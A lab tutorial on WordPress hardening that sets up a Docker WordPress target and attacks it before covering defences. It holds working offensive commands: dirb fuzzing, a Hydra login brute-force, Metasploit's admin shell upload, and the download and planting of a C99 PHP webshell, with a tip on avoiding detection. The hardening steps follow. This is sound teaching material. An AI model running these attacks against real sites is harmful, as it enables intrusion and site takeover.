---
tags: 'Hardening'
---
Importance of Wordpress hardening
===
<i class="fa fa-file-pdf-o" aria-hidden="true"></i> **Wordpress hardening**
<i class="fa fa-user-circle-o" aria-hidden="true"></i> Andy Rojas
<i class="fa fa-clock-o" aria-hidden="true"></i> 2022-09-14
:::info
**Scenario**
One day, the develoment team create a Worpdress website for your company, in this site we post important content about new jobs and the list of products that we have. What is the next step when the website is finished from development perspective?
:::
[TOC]
## Install Wordpress using Portainer
Create a new docker stack using the following lines, in case you already have a Wordpress installed, skip this step.
```bash=
version: "3.9"
services:
db:
image: mysql:5.7
volumes:
- db_data:/var/lib/mysql
restart: always
environment:
MYSQL_ROOT_PASSWORD: dbpassword
MYSQL_DATABASE: wordpress_local
MYSQL_USER: wordpress_db_user
MYSQL_PASSWORD: wordpress_db_password
platform: linux/x86_64
wordpress:
depends_on:
- db
image: wordpress:6.0.2
volumes:
- wordpress_data:/var/www/html
ports:
- "8000:80"
restart: always
environment:
WORDPRESS_DB_HOST: db:3306
WORDPRESS_DB_USER: wordpress_db_user
WORDPRESS_DB_PASSWORD: wordpress_db_password
WORDPRESS_DB_NAME: wordpress_local
volumes:
db_data: {}
wordpress_data: {}
```
Check if the Wordpress was installed. http://192.168.XXX.XXX:8000.
Setup the Worpdress site and change the theme for **Twenty Twenty**.
## Find wp-login page
Try to use https://website.com/wp-login.php, if it doesn't work, you can fuzz the site using dirb tool.
Fuzzing command example
```bash=
dirb http://1.1.1.1:8000 /usr/share/dirb/wordlists/common.txt
```
## Execute dictionary attack
Now, we are going to use **Hydra** to execute the attack.
Execute the following command
```bash=
hydra -l admin -p admin 192.168.69.1 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location" -s 8000
```
----------------------------------
## Execute webshell using Metasploit
Using the Kali Linux machine (or similar), open Metasploit.
```bash=
msfconsole
```
Select the exploit
```bash=
use exploit/unix/webapp/wp_admin_shell_upload
```
Set target IP
```bash=
set RHOSTS 192.168.XXX.XXX
```
Set target port
```bash=
set RPORT 8000
```
Set Wordpress username
```bash=
set USERNAME admin
```
Set Wordpress password
```bash=
set PASSWORD admin
```
Set Wordpress homepage
```bash=
set targeturi /
```
Execute the exploit
```bash=
exploit
```
Using the Wordpress Portainer CMD, install net-tools
```bash=
apt update
apt install net-tools
```
Check the Metasploit connection in Portainer using **netstat -tuna**
Then, execute the exploit
**=== Kali ===**
```bash=
cd ~/Downloads
```
```bash=
wget https://raw.githubusercontent.com/KaizenLouie/C99Shell-PHP7/master/c99shell.php
```
```bash=
mv c99shell.php 1.php
```
**=== Meterpreter ===**
```bash=
cd /var/www/html/wp-content/themes/twentytwenty
```
```bash=
lcd Downloads
```
```bash=
upload 1.php
```
**=== Browser ===**
Result: http://192.168.XXX.XXX:8000/wp-content/themes/twentytwenty/1.php
Close the connection using **exit** to avoid being discovered, as you can see, the connection to the port 4444 is already closed.
## Wordpress hardening
### Restrict wp-admin.php and wp-login.php by IP
* Using Portainer, open a console in the Wordpress instance.
* Inside .htaccess file, copy and paste the next lines of code to the top of the file.
```bash=
# BEGIN Restrict wp-login and wp-admin
<If "%{THE_REQUEST} =~ m#^GET /wp-login#">
SetEnvIf X-FORWARDED-FOR 1.1.1.1 allow
order deny,allow
deny from all
allow from env=allow
Allow from 1.1.1.1
</If>
<If "%{THE_REQUEST} =~ m#^GET /wp-admin#">
SetEnvIf X-FORWARDED-FOR 1.1.1.1 allow
order deny,allow
deny from all
allow from env=allow
Allow from 1.1.1.1
</If>
# END Restrict wp-login and wp-admin
```
* Save the changes and test it.
### HTTP Headers
* Install and activate HTTP Headers plugins. Plugins > Add New.
* Go to Settings > HTTP Headers and click on Security.
* Inside Security, we are going to configure the next security headers.
* Inside X-Frame-Options, turn on the header and keep the DENY option inside the dropdown list.
* Inside X-XSS-Protection, turn on the header and select the option 1; mode=block inside the dropdown list.
* Inside X-Content-Type-Options, turn on the header and keep the nosniff option inside the dropdown list.
* Inside Strict-Transport-Security, turn on the header and select the 30 days option inside the dropdown list.
* Inside Referrer-Policy, turn on the header and select the no-referrer-when-downgrade option inside the dropdown list.
* Inside Content-Security-Policy, turn on the header and only turn on the font-src option for this case, select the * option.
* Inside Expect-CT, turn on the header and select the max-age 90 days option inside the dropdown list, keep empty the report-uri and turn on enforce.
* Inside Permissions-Policy, turn on the header and only turn on the geolocation option for this case, select the origin(s) option inside the dropdown list and write the current website inside the input.
* Or copy and paste the next code inside .htaccess
```bash=
# BEGIN HttpHeaders
<IfModule mod_headers.c>
Header always set X-Content-Type-Options "nosniff"
<FilesMatch "\.(php|html)$">
Header set X-Frame-Options "SAMEORIGIN"
Header set X-XSS-Protection "1; mode=block"
Header set Strict-Transport-Security "max-age=31536000; includeSubDomains" env=HTTPS
Header set Content-Security-Policy "upgrade-insecure-requests"
Header set Referrer-Policy "no-referrer-when-downgrade"
Header set Permissions-Policy "geolocation=(self)"
</FilesMatch>
</IfModule>
# END HttpHeaders
```
* Test the website using https://securityheaders.com/ to check if the security headers works fine.
### Wordfence plugin
* Install and activate Wordfence Security plugin. Plugins > Add New.
* Go to Wordfence and write the email where wordfence will send the email alerts. To know what email can you use, contact your department manager.
* If you want to buy a premium key, put the key inside the input or click on No Thanks to use the free version.
* Then click on Click here to configute to install .HTACCESS with the WAF configuration of Wordpress in your Wordpress website.
* Then download .HTACCESS backup and click on Continue to finish the process.
### Disable XML-RPC
* Go to Wordfence -> Login Security -> Settings and activate the opcion **disable XML-RPC authentication** and then, click on **Save** button
### Install Inactive Logout
* Install and activate Inactive Logout plugin. Plugins > Add New.
* Go to Setting → Inactive Logout and set the time and expiration message
* After 15 minutes being deactivate, your session is closed.
### Force HTTP redirect to HTTPS
* Inside .htaccess file, copy and paste the next lines of code to the top of the file.
```bash=
# BEGIN Force HTTPS
RewriteEngine On
RewriteCond %{HTTPS} off
RewriteCond %{HTTP_HOST} ^(www\.)?yourwebsite\.com$ [NC]
RewriteRule ^(.*)$ https://www.yourwebsite.com/$1 [L,R=301]
# BEGIN Force HTTPS
```
### Re-test the site following the firsts steps.
Google Drive
Gist
Clipboard
Sign in with Wallet
